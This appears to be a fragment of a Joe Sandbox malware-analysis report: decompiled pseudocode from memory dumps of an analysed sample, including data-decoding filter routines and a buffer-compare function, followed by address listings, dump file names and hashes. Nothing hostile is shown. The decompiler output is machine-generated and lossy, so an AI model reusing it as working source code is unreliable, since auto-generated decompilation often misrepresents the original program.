						_t218 = 0;
						 *(_t355 + 0x18) = _t351;
						_t319 = _t351 - _t278;
						 *(_t355 + 0x24) = 0;
						 *(_t355 + 0x14) = _t319;
						do {
							_t279 = 0;
							if(_t218 >= _t289) {
								goto L67;
							}
							_t334 = _t319 + _t218;
							_t320 =  *(_t355 + 0x20);
							_t221 =  *(_t355 + 0x3c) - _t351;
							_t352 =  *(_t355 + 0x3c);
							 *(_t355 + 0x28) = _t221;
							do {
								if( &(_t334[_t221]) >= _t320) {
									_t227 =  *_t334 & 0x000000ff;
									_t291 =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x38) =  *_t334 & 0x000000ff;
									 *(_t355 + 0x34) =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x44) = E010258CA(_t320, _t227 - _t291 + _t279 - _t279);
									 *(_t355 + 0x28) = E010258CA(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x3c));
									_t234 = E010258CA(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x3c));
									_t292 =  *((intOrPtr*)(_t355 + 0x4c));
									_t355 = _t355 + 0xc;
									_t321 =  *(_t355 + 0x1c);
									if(_t292 > _t321 || _t292 > _t234) {
										_t289 =  *(_t355 + 0x30);
										_t320 =  *(_t355 + 0x20);
										_t279 =  *(_t355 + 0x38);
										if(_t321 > _t234) {
											_t279 =  *(_t355 + 0x34);
										}
									} else {
										_t289 =  *(_t355 + 0x30);
										_t320 =  *(_t355 + 0x20);
									}
								}
								_t223 =  *(_t355 + 0x2c);
								_t279 = _t279 -  *_t223 & 0x000000ff;
								 *(_t355 + 0x2c) = _t223 + 1;
								_t334[_t352] = _t279;
								_t334 =  &(_t334[3]);
								_t221 =  *(_t355 + 0x28);
							} while ( &(_t334[ *(_t355 + 0x28)]) < _t289);
							_t351 =  *(_t355 + 0x18);
							_t218 =  *(_t355 + 0x24);
							_t319 =  *(_t355 + 0x14);
							L67:
							_t218 = _t218 + 1;
							 *(_t355 + 0x24) = _t218;
						} while (_t218 < 3);
						_t335 =  *(_t355 + 0x44);
						_t290 = _t289 + 0xfffffffe;
						while(_t335 < _t290) {
							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
							_t335 = _t335 + 3;
						}
						goto L15;
					}
				}
				if(_t311 == 5) {
					_t235 = __ecx[5];
					_t293 =  *__ecx;
					_t281 = __ecx[1];
					 *(_t355 + 0x34) = _t293;
					 *(_t355 + 0x38) = _t235;
					 *(_t355 + 0x40) = _t293 + _t235;
					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
						goto L98;
					} else {
						_t336 = 0;
						 *(_t355 + 0x3c) = 0;
						if(_t281 == 0) {
							goto L15;
						} else {
							goto L21;
						}
						do {
							L21:
							 *(_t355 + 0x28) =  *(_t355 + 0x28) & 0x00000000;
							 *(_t355 + 0x24) =  *(_t355 + 0x24) & 0x00000000;
							_t345 = 0;
							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
							_t353 = 0;
							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0;
							 *(_t355 + 0x24) = 0;
							E0101F350(_t336, _t355 + 0x48, 0, 0x1c);
							 *(_t355 + 0x3c) =  *(_t355 + 0x3c) & 0;
							_t355 = _t355 + 0xc;
							 *(_t355 + 0x2c) = _t336;
							if(_t336 <  *(_t355 + 0x38)) {
								_t238 =  *(_t355 + 0x14);
								do {
									_t322 =  *(_t355 + 0x24);
									 *(_t355 + 0x1c) = _t322 -  *(_t355 + 0x20);
									_t297 =  *(_t355 + 0x34);
									 *(_t355 + 0x20) = _t322;
									_t323 =  *_t297 & 0x000000ff;
									 *(_t355 + 0x34) =  &(_t297[1]);
									_t304 = ( *(_t355 + 0x1c) * _t238 + _t345 *  *(_t355 + 0x1c) + _t353 *  *(_t355 + 0x24) +  *(_t355 + 0x28) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
									 *( *(_t355 + 0x2c) +  *(_t355 + 0x40)) = _t304;
									_t349 = _t323 << 3;
									 *(_t355 + 0x28) = _t304 -  *(_t355 + 0x28);
									 *(_t355 + 0x2c) = _t304;
									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E010258CA(_t323, _t323 << 3);
									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E010258CA(_t323, (_t323 << 3) -  *(_t355 + 0x24));
									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E010258CA(_t323,  *(_t355 + 0x28) + (_t323 << 3));
									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E010258CA(_t323, (_t323 << 3) -  *(_t355 + 0x28));
									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E010258CA(_t323,  *(_t355 + 0x2c) + _t349);
									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E010258CA(_t323, _t349 -  *(_t355 + 0x1c));
									 *((intOrPtr*)(_t355 + 0x7c)) =  *((intOrPtr*)(_t355 + 0x7c)) + E010258CA(_t323, _t349 +  *(_t355 + 0x1c));
									_t355 = _t355 + 0x1c;
									if(( *(_t355 + 0x30) & 0x0000001f) != 0) {
										_t345 =  *(_t355 + 0x18);
										_t238 =  *(_t355 + 0x14);
									} else {
										_t324 =  *(_t355 + 0x48);
										_t266 = 0;
										 *(_t355 + 0x48) =  *(_t355 + 0x48) & 0;
										_t308 = 1;
										do {
											if( *(_t355 + 0x48 + _t308 * 4) < _t324) {
												_t324 =  *(_t355 + 0x48 + _t308 * 4);
												_t266 = _t308;
											}
											 *(_t355 + 0x48 + _t308 * 4) =  *(_t355 + 0x48 + _t308 * 4) & 0x00000000;
											_t308 = _t308 + 1;
										} while (_t308 < 7);
										_t345 =  *(_t355 + 0x18);
										_t267 = _t266 - 1;
										if(_t267 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t353 >= 0xfffffff0) {
												_t353 = _t353 - 1;
											}
											goto L49;
										}
										_t268 = _t267 - 1;
										if(_t268 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t353 < 0x10) {
												_t353 = _t353 + 1;
											}
											goto L49;
										}
										_t269 = _t268 - 1;
										if(_t269 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t345 < 0xfffffff0) {
												goto L49;
											}
											_t345 = _t345 - 1;
											L43:
											 *(_t355 + 0x18) = _t345;
											goto L49;
										}
										_t270 = _t269 - 1;
										if(_t270 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t345 >= 0x10) {
												goto L49;
											}
											_t345 = _t345 + 1;
											goto L43;
										}
										_t271 = _t270 - 1;
										if(_t271 == 0) {
											_t238 =  *(_t355 + 0x14);
											if(_t238 < 0xfffffff0) {
												goto L49;
											}
											_t238 = _t238 - 1;
											L36:
											 *(_t355 + 0x14) = _t238;
											goto L49;
										}
										_t238 =  *(_t355 + 0x14);
										if(_t271 != 1 || _t238 >= 0x10) {
											goto L49;
										} else {
											_t238 = _t238 + 1;
											goto L36;
										}
									}
									L49:
									_t306 =  *(_t355 + 0x2c) + _t281;
									 *(_t355 + 0x30) =  *(_t355 + 0x30) + 1;
									 *(_t355 + 0x2c) = _t306;
								} while (_t306 <  *(_t355 + 0x38));
								_t336 =  *(_t355 + 0x3c);
							}
							_t336 = _t336 + 1;
							 *(_t355 + 0x3c) = _t336;
						} while (_t336 < _t281);
						goto L15;
					}
				}
				if(_t311 != 6) {
					goto L15;
				}
				_t309 = __ecx[5];
				_t354 = 0;
				_t325 = __ecx[1];
				 *(_t355 + 0x2c) = _t309;
				 *(_t355 + 0x30) = _t309 + _t309;
				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
					goto L98;
				} else {
					_t274 = _t325;
					 *(_t355 + 0x28) = _t325;
					do {
						_t282 = 0;
						_t338 = _t309;
						if(_t309 <  *(_t355 + 0x30)) {
							_t310 =  *(_t355 + 0x30);
							goto L12;
							L12:
							_t275 =  *_t339;
							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
							_t354 = _t354 + 1;
							 *((char*)(_t275 + _t338)) = _t282;
							_t338 = _t338 + _t325;
							if(_t338 < _t310) {
								goto L12;
							} else {
								_t309 =  *(_t355 + 0x2c);
								_t274 =  *(_t355 + 0x28);
								goto L14;
							}
						}
						L14:
						_t309 = _t309 + 1;
						_t274 = _t274 - 1;
						 *(_t355 + 0x2c) = _t309;
						 *(_t355 + 0x28) = _t274;
					} while (_t274 != 0);
					goto L15;
				}
			}

0x0100be13
0x0100be1d
0x0100be22
0x0100beb9
0x00000000
0x0100beb9
0x0100be2b
0x0100c303
0x0100c306
0x0100c308
0x0100c30b
0x0100c314
0x0100c375
0x00000000
0x0100c375
0x0100c31c
0x0100c31e
0x0100c320
0x0100c326
0x00000000
0x00000000
0x00000000
0x00000000
0x0100c32c
0x0100c32c
0x0100c32c
0x0100c32e
0x0100c32f
0x0100c330
0x0100c334
0x0100c33a
0x0100c33e
0x0100c351
0x0100c359
0x0100c35d
0x0100c35d
0x0100c340
0x0100c345
0x0100c347
0x0100c34d
0x0100c34d
0x0100c345
0x0100c35f
0x0100c363
0x0100c366
0x0100c369
0x0100c369
0x0100c36c
0x00000000
0x0100c370
0x0100be34
0x0100c23d
0x0100c23f
0x0100c248
0x00000000
0x00000000
0x0100c251
0x0100c254
0x0100c25a
0x00000000
0x00000000
0x0100c264
0x0100c265
0x0100c269
0x0100c26f
0x0100c272
0x00000000
0x00000000
0x0100c274
0x0100c27c
0x00000000
0x00000000
0x0100c27e
0x0100c282
0x0100c284
0x0100c289
0x0100c28d
0x0100c291
0x0100c292
0x0100c299
0x0100c29d
0x0100c2ac
0x0100c2c7
0x0100c2c7
0x0100c2cc
0x0100c2d0
0x0100c2d0
0x0100c2d4
0x0100c2d5
0x0100c2d8
0x0100c2dc
0x0100c2e1
0x0100c2e5
0x0100c2e9
0x0100c2e9
0x0100c2ec
0x0100c2ed
0x0100c2f0
0x0100c2f4
0x0100c2f4
0x00000000
0x0100c2fe
0x0100be3d
0x0100c0f1
0x0100c0f4
0x0100c0f7
0x0100c0fa
0x0100c0fe
0x0100c101
0x0100c108
0x0100c10c
0x0100c115
0x00000000
0x0100c12c
0x0100c12c
0x0100c12e
0x0100c132
0x0100c135
0x0100c139
0x0100c13d
0x0100c13f
0x0100c143
0x0100c147
0x0100c147
0x0100c14b
0x00000000
0x00000000
0x0100c151
0x0100c158
0x0100c15c
0x0100c15e
0x0100c162
0x0100c166
0x0100c16a
0x0100c16c
0x0100c16f
0x0100c177
0x0100c17d
0x0100c18b
0x0100c1a0
0x0100c1a4
0x0100c1a9
0x0100c1ad
0x0100c1b0
0x0100c1b6
0x0100c1c6
0x0100c1cc
0x0100c1d0
0x0100c1d4
0x0100c1d6
0x0100c1d6
0x0100c1bc
0x0100c1bc
0x0100c1c0
0x0100c1c0
0x0100c1b6
0x0100c1da
0x0100c1e1
0x0100c1e4
0x0100c1ec
0x0100c1ef
0x0100c1f6
0x0100c1f6
0x0100c200
0x0100c204
0x0100c208
0x0100c20c
0x0100c20c
0x0100c20d
0x0100c211
0x0100c21a
0x0100c21e
0x0100c231
0x0100c223
0x0100c227
0x0100c22a
0x0100c22e
0x0100c22e
0x00000000
0x0100c235
0x0100c115
0x0100be46
0x0100bec5
0x0100bec8
0x0100beca
0x0100becd
0x0100bed3
0x0100bed7
0x0100bee0
0x00000000
0x0100befa
0x0100befa
0x0100befc
0x0100bf02
0x00000000
0x00000000
0x00000000
0x00000000
0x0100bf04
0x0100bf04
0x0100bf04
0x0100bf0d
0x0100bf12
0x0100bf14
0x0100bf19
0x0100bf1b
0x0100bf20
0x0100bf28
0x0100bf2c
0x0100bf31
0x0100bf35
0x0100bf38
0x0100bf40
0x0100bf46
0x0100bf4a
0x0100bf4a
0x0100bf58
0x0100bf5c
0x0100bf65
0x0100bf69
0x0100bf6d
0x0100bf96
0x0100bf98
0x0100bfa7
0x0100bfab
0x0100bfaf
0x0100bfb8
0x0100bfc8
0x0100bfd8
0x0100bfe8
0x0100bff8
0x0100c006
0x0100c013
0x0100c017
0x0100c01f
0x0100c0bb
0x0100c0bf
0x0100c025
0x0100c025
0x0100c029
0x0100c02b
0x0100c031
0x0100c032
0x0100c036
0x0100c038
0x0100c03c
0x0100c03c
0x0100c03e
0x0100c043
0x0100c044
0x0100c049
0x0100c04d
0x0100c050
0x0100c0af
0x0100c0b6
0x0100c0b8
0x0100c0b8
0x00000000
0x0100c0b6
0x0100c052
0x0100c055
0x0100c0a3
0x0100c0aa
0x0100c0ac
0x0100c0ac
0x00000000
0x0100c0aa
0x0100c057
0x0100c05a
0x0100c093
0x0100c09a
0x00000000
0x00000000
0x0100c09c
0x0100c09d
0x0100c09d
0x00000000
0x0100c09d
0x0100c05c
0x0100c05f
0x0100c087
0x0100c08e
0x00000000
0x00000000
0x0100c090
0x00000000
0x0100c090
0x0100c061
0x0100c064
0x0100c07b
0x0100c082
0x00000000
0x00000000
0x0100c084
0x0100c075
0x0100c075
0x00000000
0x0100c075
0x0100c069
0x0100c06d
0x00000000
0x0100c074
0x0100c074
0x00000000
0x0100c074
0x0100c06d
0x0100c0c3
0x0100c0c7
0x0100c0c9
0x0100c0cd
0x0100c0d1
0x0100c0db
0x0100c0db
0x0100c0df
0x0100c0e0
0x0100c0e4
0x00000000
0x0100c0ec
0x0100bee0
0x0100be4b
0x00000000
0x00000000
0x0100be4d
0x0100be50
0x0100be52
0x0100be55
0x0100be5c
0x0100be66
0x00000000
0x0100be80
0x0100be80
0x0100be82
0x0100be86
0x0100be86
0x0100be88
0x0100be8e
0x0100be90
0x0100be90
0x0100be94
0x0100be94
0x0100be96
0x0100be99
0x0100be9a
0x0100be9d
0x0100bea1
0x00000000
0x0100bea3
0x0100bea3
0x0100bea7
0x00000000
0x0100bea7
0x0100bea1
0x0100beab
0x0100beab
0x0100beac
0x0100beaf
0x0100beb3
0x0100beb3
0x00000000
0x0100be86

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945c1ed91fd26cc7ca090dacbf554880c29e3fb9b56d5769a45190b2401501bd
Instruction ID: 205588128f9b83016d3b29eda2bd652445ca8866b9032239736706e6716dd716
Opcode Fuzzy Hash: 945c1ed91fd26cc7ca090dacbf554880c29e3fb9b56d5769a45190b2401501bd
Instruction Fuzzy Hash: 1FF18A716083418FE35ACF28C5849AEBBE1EFCA314F148BAEF5D597291D630E905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01020B43, Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E01020B43(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}

0x01020b43
0x01020b43
0x01020b49
0x01020bd0
0x01020bd2
0x01020bd4
0x00000000
0x00000000
0x01020bda
0x01020be0
0x01020c67
0x01020c69
0x01020c6b
0x00000000
0x00000000
0x01020c71
0x01020c77
0x01020cfe
0x01020d00
0x01020d02
0x00000000
0x00000000
0x01020d08
0x01020d0e
0x01020d95
0x01020d97
0x01020d99
0x00000000
0x00000000
0x01020d9f
0x01020da5
0x01020e2c
0x01020e2e
0x01020e30
0x00000000
0x00000000
0x01020e3c
0x01020ec4
0x01020ec6
0x01020ec8
0x00000000
0x00000000
0x01020ece
0x01020ed4
0x01020f5b
0x01020f5d
0x01020f5f
0x01020f5f
0x00000000
0x01020f5f
0x01020ee1
0x01020ee3
0x01020efb
0x01020f03
0x01020f05
0x01020f1d
0x01020f25
0x01020f27
0x01020f3f
0x01020f47
0x01020f49
0x01020f52
0x01020f52
0x00000000
0x01020f49
0x01020f30
0x01020f39
0x00000000
0x00000000
0x00000000
0x01020f39
0x01020f0e
0x01020f17
0x00000000
0x00000000
0x00000000
0x01020f17
0x01020eec
0x01020ef5
0x00000000
0x00000000
0x00000000
0x01020ef5
0x01020e4a
0x01020e4c
0x01020e64
0x01020e6c
0x01020e6e
0x01020e86
0x01020e8e
0x01020e90
0x01020ea8
0x01020eb0
0x01020eb2
0x01020ebb
0x01020ebb
0x00000000
0x01020eb2
0x01020e99
0x01020ea2
0x00000000
0x00000000
0x00000000
0x01020ea2
0x01020e77
0x01020e80
0x00000000
0x00000000
0x00000000
0x01020e80
0x01020e55
0x01020e5e
0x00000000
0x00000000
0x00000000
0x01020e5e
0x01020db2
0x01020db4
0x01020dcc
0x01020dd4
0x01020dd6
0x01020dee
0x01020df6
0x01020df8
0x01020e10
0x01020e18
0x01020e1a
0x01020e23
0x01020e23
0x00000000
0x01020e1a
0x01020e01
0x01020e0a
0x00000000
0x00000000
0x00000000
0x01020e0a
0x01020ddf
0x01020de8
0x00000000
0x00000000
0x00000000
0x01020de8
0x01020dbd
0x01020dc6
0x00000000
0x00000000
0x00000000
0x01020dc6
0x01020d1b
0x01020d1d
0x01020d35
0x01020d3d
0x01020d3f
0x01020d57
0x01020d5f
0x01020d61
0x01020d79
0x01020d81
0x01020d83
0x01020d8c
0x01020d8c
0x00000000
0x01020d83
0x01020d6a
0x01020d73
0x00000000
0x00000000
0x00000000
0x01020d73
0x01020d48
0x01020d51
0x00000000
0x00000000
0x00000000
0x01020d51
0x01020d26
0x01020d2f
0x00000000
0x00000000
0x00000000
0x01020d2f
0x01020c84
0x01020c86
0x01020c9e
0x01020ca6
0x01020ca8
0x01020cc0
0x01020cc8
0x01020cca
0x01020ce2
0x01020cea
0x01020cec
0x01020cf5
0x01020cf5
0x00000000
0x01020cec
0x01020cd3
0x01020cdc
0x00000000
0x00000000
0x00000000
0x01020cdc
0x01020cb1
0x01020cba
0x00000000
0x00000000
0x00000000
0x01020cba
0x01020c8f
0x01020c98
0x00000000
0x00000000
0x00000000
0x01020c98
0x01020bed
0x01020bef
0x01020c07
0x01020c0f
0x01020c11
0x01020c29
0x01020c31
0x01020c33
0x01020c4b
0x01020c53
0x01020c55
0x01020c5e
0x01020c5e
0x00000000
0x01020c55
0x01020c3c
0x01020c45
0x00000000
0x00000000
0x00000000
0x01020c45
0x01020c1a
0x01020c23
0x00000000
0x00000000
0x00000000
0x01020c23
0x01020bf8
0x01020c01
0x00000000
0x00000000
0x00000000
0x01020b4f
0x01020b4f
0x01020b56
0x01020b58
0x01020b70
0x01020b70
0x01020b78
0x01020b7a
0x01020b92
0x01020b92
0x01020b9a
0x01020b9c
0x01020bb4
0x01020bb4
0x01020bbc
0x01020bbe
0x01020bc7
0x01020bc7
0x00000000
0x01020bbe
0x01020ba2
0x01020ba5
0x01020bae
0x01020706
0x01020706
0x010214f7
0x010214f7
0x00000000
0x01020bae
0x01020b80
0x01020b83
0x01020b8c
0x00000000
0x00000000
0x00000000
0x01020b8c
0x01020b5e
0x01020b61
0x01020b6a
0x00000000
0x00000000
0x00000000
0x01020b6a

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
